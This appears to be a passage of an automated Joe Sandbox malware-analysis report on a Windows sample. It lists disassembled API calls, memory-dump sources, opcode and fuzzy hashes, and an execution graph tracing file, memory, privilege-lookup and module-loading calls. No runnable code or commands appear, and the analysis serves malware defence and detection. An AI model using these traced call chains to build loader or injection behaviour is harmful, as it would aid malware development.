                                                                                                                                                                                                                                                                                  • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,HeapVerify,00007FF72F5AC313,?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AD08B
                                                                                                                                                                                                                                                                                  • strtoull.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,HeapVerify,00007FF72F5AC313,?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AD0C8
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: _stricmpstrtoull
                                                                                                                                                                                                                                                                                  • String ID: HeapVerify
                                                                                                                                                                                                                                                                                  • API String ID: 4031153986-2674988305
                                                                                                                                                                                                                                                                                  • Opcode ID: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
                                                                                                                                                                                                                                                                                  • Instruction ID: adeb7b2fea6565d0f020a9cb084bdfcd6526bea432e490d5f122472453b81a56
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a336707b4a45596346e9791d434987ae1de577f78f4eb99a8291cf3e8841bd7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D018032B09AC189E710BF12ED801EAF7A6FB58780F949035DA4E43A19DF3DD4568A10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D3260 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D32ED
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D333E
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D3374
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000003,00007FF72F5BD6BF,01FFF001,00000000,00000000,00007FF72F5CBD4F), ref: 00007FF72F5D338F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
                                                                                                                                                                                                                                                                                  • Instruction ID: 1fe37985efe517f2b6fdc7117938deeea0eec443a5f28c3a819848726b4168cd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e743cea26d5aa4e05b231aa46b4469101279d7ee653fa58b53f11e4b04d877f5
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5415A21F086C282EA50AF16ED403F9A790EF58B98FD40136DA6D47AA5CE3CE154CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C4020 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C406A
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C40AC
                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C40D7
                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF72F5C419F,?,?,?,00007FF72F5D1E7B), ref: 00007FF72F5C40F8
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
                                                                                                                                                                                                                                                                                  • Instruction ID: 7d79e657b8cd9b9d33131c35b56bd1ce617fde6f01f7b7a6bb748929cc3c6372
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fad017503d982359f6b350fff991fd565ce6d91fee4a39b5e2a1188cb59f1a07
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71216B25F4898282EA50AF15ED803F5A750EF287F8FD80236C52D466E5DF7CE194CB61

                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                  Execution Coverage:1.9%
                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                                                                                                                                                                                  Signature Coverage:5.8%
                                                                                                                                                                                                                                                                                  Total number of Nodes:554
                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:69
                                                                                                                                                                                                                                                                                  execution_graph 72828 41f0f0 72831 41b970 72828->72831 72832 41b996 72831->72832 72839 409d40 72832->72839 72834 41b9a2 72838 41b9c3 72834->72838 72847 40c1c0 72834->72847 72836 41b9b5 72883 41a6b0 72836->72883 72886 409c90 72839->72886 72841 409d4d 72842 409d54 72841->72842 72898 409c30 72841->72898 72842->72834 72848 40c1e5 72847->72848 73315 40b1c0 72848->73315 72850 40c23c 73319 40ae40 72850->73319 72852 40c4b3 72852->72836 72853 40c262 72853->72852 73328 4143a0 72853->73328 72855 40c2a7 72855->72852 73331 408a60 72855->73331 72857 40c2eb 72857->72852 73338 41a500 72857->73338 72861 40c341 72862 40c348 72861->72862 73350 41a010 72861->73350 72863 41bdc0 2 API calls 72862->72863 72865 40c355 72863->72865 72865->72836 72867 40c392 72868 41bdc0 2 API calls 72867->72868 72869 40c399 72868->72869 72869->72836 72870 40c3a2 72871 40f4a0 3 API calls 72870->72871 72872 40c416 72871->72872 72872->72862 72873 40c421 72872->72873 72874 41bdc0 2 API calls 72873->72874 72875 40c445 72874->72875 73356 41a060 72875->73356 72878 41a010 2 API calls 72879 40c480 72878->72879 72879->72852 73361 419e20 72879->73361 72882 41a6b0 2 API calls 72882->72852 72884 41af60 LdrLoadDll 72883->72884 72885 41a6cf ExitProcess 72884->72885 72885->72838 72887 409ca3 72886->72887 72937 418bc0 LdrLoadDll 72886->72937 72917 418a70 72887->72917 72890 409cb6 72890->72841 72891 409cac 72891->72890 72920 41b2b0 72891->72920 72893 409cf3 72893->72890 72931 409ab0 72893->72931 72895 409d13 72938 409620 LdrLoadDll 72895->72938 72897 409d25 72897->72841 73290 41b5a0 72898->73290 72901 41b5a0 LdrLoadDll 72902 409c5b 72901->72902 72903 41b5a0 LdrLoadDll 72902->72903 72904 409c71 72903->72904 72905 40f180 72904->72905 72906 40f199 72905->72906 73298 40b040 72906->73298 72908 40f1ac 73302 41a1e0 72908->73302 72911 409d65 72911->72834 72913 40f1d2 72916 40f1fd 72913->72916 73308 41a260 72913->73308 72914 41a490 2 API calls 72914->72911 72916->72914 72939 41a600 72917->72939 72921 41b2c9 72920->72921 72952 414a50 72921->72952 72923 41b2e1 72924 41b2ea 72923->72924 72991 41b0f0 72923->72991 72924->72893 72926 41b2fe 72926->72924 73009 419f00 72926->73009 73268 407ea0 72931->73268 72933 409ad1 72933->72895 72934 409aca 72934->72933 73281 408160 72934->73281 72937->72887 72938->72897 72942 41af60 72939->72942 72941 418a85 72941->72891 72943 41af70 72942->72943 72945 41af92 72942->72945 72946 414e50 72943->72946 72945->72941 72947 414e6a 72946->72947 72948 414e5e 72946->72948 72947->72945 72948->72947 72951 4152d0 LdrLoadDll 72948->72951 72950 414fbc 72950->72945 72951->72950 72953 414d85 72952->72953 72963 414a64 72952->72963 72953->72923 72956 414b90 73020 41a360 72956->73020 72957 414b73 73078 41a460 LdrLoadDll 72957->73078 72960 414bb7 72962 41bdc0 2 API calls 72960->72962 72961 414b7d 72961->72923 72964 414bc3 72962->72964 72963->72953 73017 419c50 72963->73017 72964->72961 72965 414d49 72964->72965 72966 414d5f 72964->72966 72971 414c52 72964->72971 72967 41a490 2 API calls 72965->72967 73087 414790 LdrLoadDll NtReadFile NtClose 72966->73087 72968 414d50 72967->72968 72968->72923 72970 414d72 72970->72923 72972 414cb9 72971->72972 72974 414c61 72971->72974 72972->72965 72973 414ccc 72972->72973 73080 41a2e0 72973->73080 72976 414c66 72974->72976 72977 414c7a 72974->72977 73079 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 72976->73079 72980 414c97 72977->72980 72981 414c7f 72977->72981 72980->72968 73036 414410 72980->73036 73024 4146f0 72981->73024 72983 414c70 72983->72923 72985 414c8d 72985->72923 72987 414d2c 73084 41a490 72987->73084 72988 414caf 72988->72923 72990 414d38 72990->72923 72992 41b101 72991->72992 72993 41b113 72992->72993 73105 41bd40 72992->73105 72993->72926 72995 41b134 73108 414070 72995->73108 72997 41b180 72997->72926 72998 41b157 72998->72997 72999 414070 3 API calls 72998->72999 73002 41b179 72999->73002 73001 41b20a 73003 41b21a 73001->73003 73234 41af00 LdrLoadDll 73001->73234 73002->72997 73140 415390 73002->73140 73150 41ad70 73003->73150 73006 41b248 73229 419ec0 73006->73229 73010 419f1c 73009->73010 73011 41af60 LdrLoadDll 73009->73011 73262 5ca2b2a 73010->73262 73011->73010 73012 419f37 73014 41bdc0 73012->73014 73265 41a670 73014->73265 73016 41b359 73016->72893 73018 41af60 LdrLoadDll 73017->73018 73019 414b44 73018->73019 73019->72956 73019->72957 73019->72961 73021 41a37c NtCreateFile 73020->73021 73022 41af60 LdrLoadDll 73020->73022 73021->72960 73022->73021 73025 41470c 73024->73025 73026 41a2e0 LdrLoadDll 73025->73026 73027 41472d 73026->73027 73028 414734 73027->73028 73029 414748 73027->73029 73030 41a490 2 API calls 73028->73030 73031 41a490 2 API calls 73029->73031 73032 41473d 73030->73032 73033 414751 73031->73033 73032->72985 73088 41bfd0 LdrLoadDll RtlAllocateHeap 73033->73088 73035 41475c 73035->72985 73037 41445b 73036->73037 73038 41448e 73036->73038 73039 41a2e0 LdrLoadDll 73037->73039 73040 4145d9 73038->73040 73045 4144aa 73038->73045 73041 414476 73039->73041 73042 41a2e0 LdrLoadDll 73040->73042 73044 41a490 2 API calls 73041->73044 73043 4145f4 73042->73043 73101 41a320 LdrLoadDll 73043->73101 73046 41447f 73044->73046 73047 41a2e0 LdrLoadDll 73045->73047 73046->72988 73048 4144c5 73047->73048 73050 4144e1 73048->73050 73051 4144cc 73048->73051 73054 4144e6 73050->73054 73055 4144fc 73050->73055 73053 41a490 2 API calls 73051->73053 73052 41462e 73056 41a490 2 API calls 73052->73056 73057 4144d5 73053->73057 73058 41a490 2 API calls 73054->73058 73063 414501 73055->73063 73089 41bf90 73055->73089 73059 414639 73056->73059 73057->72988 73060 4144ef 73058->73060 73059->72988 73060->72988 73071 414513 73063->73071 73092 41a410 73063->73092 73064 414567 73065 41457e 73064->73065 73100 41a2a0 LdrLoadDll 73064->73100 73066 414585 73065->73066 73067 41459a 73065->73067 73069 41a490 2 API calls 73066->73069 73070 41a490 2 API calls 73067->73070 73069->73071 73072 4145a3 73070->73072 73071->72988 73073 4145cf 73072->73073 73095 41bb90 73072->73095 73073->72988 73075 4145ba 73076 41bdc0 2 API calls 73075->73076 73077 4145c3 73076->73077 73077->72988 73078->72961 73079->72983 73081 414d14 73080->73081 73082 41af60 LdrLoadDll 73080->73082 73083 41a320 LdrLoadDll 73081->73083 73082->73081 73083->72987 73085 41a4ac NtClose 73084->73085 73086 41af60 LdrLoadDll 73084->73086 73085->72990 73086->73085 73087->72970 73088->73035 73091 41bfa8 73089->73091 73102 41a630 73089->73102 73091->73063 73093 41a42c NtReadFile 73092->73093 73094 41af60 LdrLoadDll 73092->73094 73093->73064 73094->73093 73096 41bbb4 73095->73096 73097 41bb9d 73095->73097 73096->73075 73097->73096 73098 41bf90 2 API calls 73097->73098 73099 41bbcb 73098->73099 73099->73075 73100->73065 73101->73052 73103 41af60 LdrLoadDll 73102->73103 73104 41a64c RtlAllocateHeap 73103->73104 73104->73091 73235 41a540 73105->73235 73107 41bd6d 73107->72995 73109 414081 73108->73109 73110 414089 73108->73110 73109->72998 73139 41435c 73110->73139 73238 41cf30 73110->73238 73112 4140dd 73113 41cf30 2 API calls 73112->73113 73117 4140e8 73113->73117 73114 414136 73116 41cf30 2 API calls 73114->73116 73120 41414a 73116->73120 73117->73114 73118 41d060 3 API calls 73117->73118 73249 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 73117->73249 73118->73117 73119 4141a7 73121 41cf30 2 API calls 73119->73121 73120->73119 73243 41d060 73120->73243 73122 4141bd 73121->73122 73124 4141fa 73122->73124 73126 41d060 3 API calls 73122->73126 73125 41cf30 2 API calls 73124->73125 73127 414205 73125->73127 73126->73122 73128 41d060 3 API calls 73127->73128 73133 41423f 73127->73133 73128->73127 73130 414334 73251 41cf90 LdrLoadDll RtlFreeHeap 73130->73251 73132 41433e 73252 41cf90 LdrLoadDll RtlFreeHeap 73132->73252 73250 41cf90 LdrLoadDll RtlFreeHeap 73133->73250 73135 414348 73253 41cf90 LdrLoadDll RtlFreeHeap 73135->73253 73137 414352 73254 41cf90 LdrLoadDll RtlFreeHeap 73137->73254 73139->72998 73141 4153a1 73140->73141 73142 414a50 8 API calls 73141->73142 73144 4153b7 73142->73144 73143 41540a 73143->73001 73144->73143 73145 4153f2 73144->73145 73146 415405 73144->73146 73147 41bdc0 2 API calls 73145->73147 73148 41bdc0 2 API calls 73146->73148 73149 4153f7 73147->73149 73148->73143 73149->73001 73151 41ad84 73150->73151 73152 41ac30 LdrLoadDll 73150->73152 73255 41ac30 73151->73255 73152->73151 73155 41ac30 LdrLoadDll 73156 41ad96 73155->73156 73157 41ac30 LdrLoadDll 73156->73157 73158 41ad9f 73157->73158 73159 41ac30 LdrLoadDll 73158->73159 73160 41ada8 73159->73160 73161 41ac30 LdrLoadDll 73160->73161 73162 41adb1 73161->73162 73163 41ac30 LdrLoadDll 73162->73163 73164 41adbd 73163->73164 73165 41ac30 LdrLoadDll 73164->73165 73166 41adc6 73165->73166 73167 41ac30 LdrLoadDll 73166->73167 73168 41adcf 73167->73168 73169 41ac30 LdrLoadDll 73168->73169 73170 41add8 73169->73170 73171 41ac30 LdrLoadDll 73170->73171 73172 41ade1 73171->73172 73173 41ac30 LdrLoadDll 73172->73173 73174 41adea 73173->73174 73175 41ac30 LdrLoadDll 73174->73175 73176 41adf6 73175->73176 73177 41ac30 LdrLoadDll 73176->73177 73178 41adff 73177->73178 73179 41ac30 LdrLoadDll 73178->73179 73180 41ae08 73179->73180 73181 41ac30 LdrLoadDll 73180->73181 73182 41ae11 73181->73182 73183 41ac30 LdrLoadDll 73182->73183 73184 41ae1a 73183->73184 73185 41ac30 LdrLoadDll 73184->73185 73186 41ae23 73185->73186 73187 41ac30 LdrLoadDll 73186->73187 73188 41ae2f 73187->73188 73189 41ac30 LdrLoadDll 73188->73189 73190 41ae38 73189->73190 73191 41ac30 LdrLoadDll 73190->73191 73192 41ae41 73191->73192 73193 41ac30 LdrLoadDll 73192->73193 73194 41ae4a 73193->73194 73195 41ac30 LdrLoadDll 73194->73195 73196 41ae53 73195->73196 73197 41ac30 LdrLoadDll 73196->73197 73198 41ae5c 73197->73198 73199 41ac30 LdrLoadDll 73198->73199 73200 41ae68 73199->73200 73201 41ac30 LdrLoadDll 73200->73201 73202 41ae71 73201->73202 73203 41ac30 LdrLoadDll 73202->73203 73204 41ae7a 73203->73204 73205 41ac30 LdrLoadDll 73204->73205 73206 41ae83 73205->73206 73207 41ac30 LdrLoadDll 73206->73207 73208 41ae8c 73207->73208 73209 41ac30 LdrLoadDll 73208->73209 73210 41ae95 73209->73210 73211 41ac30 LdrLoadDll 73210->73211 73212 41aea1 73211->73212 73213 41ac30 LdrLoadDll 73212->73213 73214 41aeaa 73213->73214 73215 41ac30 LdrLoadDll 73214->73215 73216 41aeb3 73215->73216 73217 41ac30 LdrLoadDll 73216->73217 73218 41aebc 73217->73218 73219 41ac30 LdrLoadDll 73218->73219 73220 41aec5 73219->73220 73221 41ac30 LdrLoadDll 73220->73221 73222 41aece 73221->73222 73223 41ac30 LdrLoadDll 73222->73223 73224 41aeda 73223->73224 73225 41ac30 LdrLoadDll 73224->73225 73226 41aee3 73225->73226 73227 41ac30 LdrLoadDll 73226->73227 73228 41aeec 73227->73228 73228->73006 73230 41af60 LdrLoadDll 73229->73230 73231 419edc 73230->73231 73261 5ca2d10 LdrInitializeThunk 73231->73261 73232 419ef3 73232->72926 73234->73003 73236 41af60 LdrLoadDll 73235->73236 73237 41a55c NtAllocateVirtualMemory 73236->73237 73237->73107 73239 41cf40 73238->73239 73240 41cf46 73238->73240 73239->73112 73241 41bf90 2 API calls 73240->73241 73242 41cf6c 73241->73242 73242->73112 73244 41cfd0 73243->73244 73245 41bf90 2 API calls 73244->73245 73246 41d02d 73244->73246 73247 41d00a 73245->73247 73246->73120 73248 41bdc0 2 API calls 73247->73248 73248->73246 73249->73117 73250->73130 73251->73132 73252->73135 73253->73137 73254->73139 73256 41ac4b 73255->73256 73257 414e50 LdrLoadDll 73256->73257 73258 41ac6b 73257->73258 73259 414e50 LdrLoadDll 73258->73259 73260 41ad17 73258->73260 73259->73260 73260->73155 73261->73232 73263 5ca2b3f LdrInitializeThunk 73262->73263 73264 5ca2b31 73262->73264 73263->73012 73264->73012 73266 41af60 LdrLoadDll 73265->73266 73267 41a68c RtlFreeHeap 73266->73267 73267->73016 73269 407eb0 73268->73269 73270 407eab 73268->73270 73271 41bd40 2 API calls 73269->73271 73270->72934 73277 407ed5 73271->73277 73272 407f38 73272->72934 73273 419ec0 2 API calls 73273->73277 73274 407f3e 73276 407f64 73274->73276 73278 41a5c0 2 API calls 73274->73278 73276->72934 73277->73272 73277->73273 73277->73274 73279 41bd40 2 API calls 73277->73279 73284 41a5c0 73277->73284 73280 407f55 73278->73280 73279->73277 73280->72934 73282 41a5c0 2 API calls 73281->73282 73283 40817e 73282->73283 73283->72895 73285 41af60 LdrLoadDll 73284->73285 73286 41a5dc 73285->73286 73289 5ca2b90 LdrInitializeThunk 73286->73289 73287 41a5f3 73287->73277 73289->73287 73291 41b5c3 73290->73291 73294 40acf0 73291->73294 73295 40ad14 73294->73295 73296 40ad50 LdrLoadDll 73295->73296 73297 409c4a 73295->73297 73296->73297 73297->72901 73299 40b063 73298->73299 73301 40b0e0 73299->73301 73313 419c90 LdrLoadDll 73299->73313 73301->72908 73303 41af60 LdrLoadDll 73302->73303 73304 40f1bb 73303->73304 73304->72911 73305 41a7d0 73304->73305 73306 41a7ef LookupPrivilegeValueW 73305->73306 73307 41af60 LdrLoadDll 73305->73307 73306->72913 73307->73306 73309 41a27c 73308->73309 73310 41af60 LdrLoadDll 73308->73310 73314 5ca2dc0 LdrInitializeThunk 73309->73314 73310->73309 73311 41a29b 73311->72916 73313->73301 73314->73311 73316 40b1f0 73315->73316 73317 40b040 LdrLoadDll 73316->73317 73318 40b204 73317->73318 73318->72850 73320 40ae51 73319->73320 73321 40ae4d 73319->73321 73322 40ae6a 73320->73322 73323 40ae9c 73320->73323 73321->72853 73366 419cd0 LdrLoadDll 73322->73366 73367 419cd0 LdrLoadDll 73323->73367 73325 40aead 73325->72853 73327 40ae8c 73327->72853 73329 40f4a0 3 API calls 73328->73329 73330 4143c6 73328->73330 73329->73330 73330->72855 73368 4087a0 73331->73368 73334 408a9d 73334->72857 73335 4087a0 19 API calls 73336 408a8a 73335->73336 73336->73334 73386 40f710 10 API calls 73336->73386 73339 41af60 LdrLoadDll 73338->73339 73340 41a51c 73339->73340 73505 5ca2da0 LdrInitializeThunk 73340->73505 73341 40c322 73343 40f4a0 73341->73343 73344 40f4bd 73343->73344 73506 419fc0 73344->73506 73346 40f505 73346->72861 73348 41a010 2 API calls 73349 40f52e 73348->73349 73349->72861 73351 41a016 73350->73351 73352 41af60 LdrLoadDll 73351->73352 73353 41a02c 73352->73353 73512 5ca2c30 LdrInitializeThunk 73353->73512 73354 40c385 73354->72867 73354->72870 73357 41af60 LdrLoadDll 73356->73357 73358 41a07c 73357->73358 73513 5ca2c50 LdrInitializeThunk 73358->73513 73359 40c459 73359->72878 73362 41af60 LdrLoadDll 73361->73362 73363 419e3c 73362->73363 73514 5ca2ed0 LdrInitializeThunk 73363->73514 73364 40c4ac 73364->72882 73366->73327 73367->73325 73369 407ea0 4 API calls 73368->73369 73384 4087ba 73369->73384 73370 408a3f 73371 408160 2 API calls 73370->73371 73372 408a49 73371->73372 73372->73334 73372->73335 73375 419f00 2 API calls 73375->73384 73377 41a490 LdrLoadDll NtClose 73377->73384 73380 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 73380->73384 73383 419e20 2 API calls 73383->73384 73384->73370 73384->73372 73384->73375 73384->73377 73384->73380 73384->73383 73387 419d10 73384->73387 73390 4085d0 73384->73390 73402 40f5f0 LdrLoadDll NtClose 73384->73402 73403 419d90 LdrLoadDll 73384->73403 73404 419dc0 LdrLoadDll 73384->73404 73405 419e50 LdrLoadDll 73384->73405 73406 4083a0 73384->73406 73422 405f60 LdrLoadDll 73384->73422 73386->73334 73388 419d2c 73387->73388 73389 41af60 LdrLoadDll 73387->73389 73388->73384 73389->73388 73391 4085e6 73390->73391 73394 4085ff 73391->73394 73423 419880 73391->73423 73393 408771 73393->73384 73394->73393 73444 4081a0 73394->73444 73396 4086e5 73396->73393 73397 4083a0 11 API calls 73396->73397 73398 408713 73397->73398 73398->73393 73399 419f00 2 API calls 73398->73399 73400 408748 73399->73400 73400->73393 73401 41a500 2 API calls 73400->73401 73401->73393 73402->73384 73403->73384 73404->73384 73405->73384 73407 4083c9 73406->73407 73484 408310 73407->73484 73410 41a500 2 API calls 73411 4083dc 73410->73411 73411->73410 73412 408467 73411->73412 73415 408462 73411->73415 73492 40f670 73411->73492 73412->73384 73413 41a490 2 API calls 73414 40849a 73413->73414 73414->73412 73416 419d10 LdrLoadDll 73414->73416 73415->73413 73417 4084ff 73416->73417 73417->73412 73496 419d50 73417->73496 73419 408563 73419->73412 73420 414a50 8 API calls 73419->73420 73421 4085b8 73420->73421 73421->73384 73422->73384 73424 41bf90 2 API calls 73423->73424 73425 419897 73424->73425 73451 409310 73425->73451 73427 4198b2 73428 4198f0 73427->73428 73429 4198d9 73427->73429 73432 41bd40 2 API calls 73428->73432 73430 41bdc0 2 API calls 73429->73430 73431 4198e6 73430->73431 73431->73394 73433 41992a 73432->73433 73434 41bd40 2 API calls 73433->73434 73435 419943 73434->73435 73441 419be4 73435->73441 73457 41bd80 73435->73457 73438 419bd0 73439 41bdc0 2 API calls 73438->73439 73440 419bda 73439->73440 73440->73394 73442 41bdc0 2 API calls 73441->73442 73443 419c39 73442->73443 73443->73394 73445 40829f 73444->73445 73446 4081b5 73444->73446 73445->73396 73446->73445 73447 414a50 8 API calls 73446->73447 73448 408222 73447->73448 73449 41bdc0 2 API calls 73448->73449 73450 408249 73448->73450 73449->73450 73450->73396 73452 409335 73451->73452 73453 40acf0 LdrLoadDll 73452->73453 73454 409368 73453->73454 73456 40938d 73454->73456 73460 40cf20 73454->73460 73456->73427 73459 419bc9 73457->73459 73478 41a580 73457->73478 73459->73438 73459->73441 73461 40cf4c 73460->73461 73462 41a1e0 LdrLoadDll 73461->73462 73463 40cf65 73462->73463 73464 40cf6c 73463->73464 73471 41a220 73463->73471 73464->73456 73468 40cfa7 73469 41a490 2 API calls 73468->73469 73470 40cfca 73469->73470 73470->73456 73472 41af60 LdrLoadDll 73471->73472 73473 41a23c 73472->73473 73477 5ca2bc0 LdrInitializeThunk 73473->73477 73474 40cf8f 73474->73464 73476 41a810 LdrLoadDll 73474->73476 73476->73468 73477->73474 73479 41af60 LdrLoadDll 73478->73479 73480 41a59c 73479->73480 73483 5ca2eb0 LdrInitializeThunk 73480->73483 73481 41a5b7 73481->73459 73483->73481 73485 408328 73484->73485 73486 40acf0 LdrLoadDll 73485->73486 73487 408343 73486->73487 73488 414e50 LdrLoadDll 73487->73488 73489 408353 73488->73489 73490 40835c PostThreadMessageW 73489->73490 73491 408370 73489->73491 73490->73491 73491->73411 73493 40f683 73492->73493 73499 419e90 73493->73499 73497 41af60 LdrLoadDll 73496->73497 73498 419d6c 73497->73498 73498->73419 73500 419eac 73499->73500 73501 41af60 LdrLoadDll 73499->73501 73504 5ca2cf0 LdrInitializeThunk 73500->73504 73501->73500 73502 40f6ae 73502->73411 73504->73502 73505->73341 73507 41af60 LdrLoadDll 73506->73507 73508 419fdc 73507->73508 73511 5ca2e50 LdrInitializeThunk 73508->73511 73509 40f4fe 73509->73346 73509->73348 73511->73509 73512->73354 73513->73359 73514->73364 73515 5ca29f0 LdrInitializeThunk

                                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                                  Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
